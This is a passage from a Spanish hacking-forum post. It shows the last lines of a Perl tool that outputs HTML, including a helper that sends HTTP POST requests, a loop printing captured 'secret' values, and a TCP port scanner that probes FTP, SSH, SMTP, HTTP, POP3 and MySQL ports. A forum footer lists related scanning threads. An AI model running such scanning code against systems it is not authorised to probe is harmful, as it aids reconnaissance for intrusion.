  763.                print $secret. ":" . $1 . "<br>";
  764.            }
  765.        }
  766.    }
  767.    print "<br>[+] Finish<br>";
  768. }
  769.  
  770. sub tomar {
  771.    my ( $web, $var ) = @_;
  772.    return $nave->post( $web, [ %{$var} ] )->content;
  773. }
  774.  
  775. sub scanuno {
  776.  
  777.    my %ports = (
  778.        "21"   => "ftp",
  779.        "22"   => "ssh",
  780.        "25"   => "smtp",
  781.        "80"   => "http",
  782.        "110"  => "pop3",
  783.        "3306" => "mysql"
  784.    );
  785.  
  786.    print "<br>[+] Scanning $_[0]<br><br><br>";
  787.  
  788.    for my $port ( keys %ports ) {
  789.  
  790.        if (
  791.            new IO::Socket::INET(
  792.                PeerAddr => $_[0],
  793.                PeerPort => $port,
  794.                Proto    => "tcp",
  795.                Timeout  => 0.5
  796.            )
  797.          )
  798.        {
  799.            print "[Port] : "
  800.              . $port
  801.              . " [Service] : "
  802.              . $ports{$port} . "<br>";
  803.        }
  804.    }
  805.    print "<br><br>[+] Scan Finish<br>";
  806. }
  807.  
  808. # The End ?
  809.  
  810.  
« Última modificación: Marzo 14, 2015, 10:17:00 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3003
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1409
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1039
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1180
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1550
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d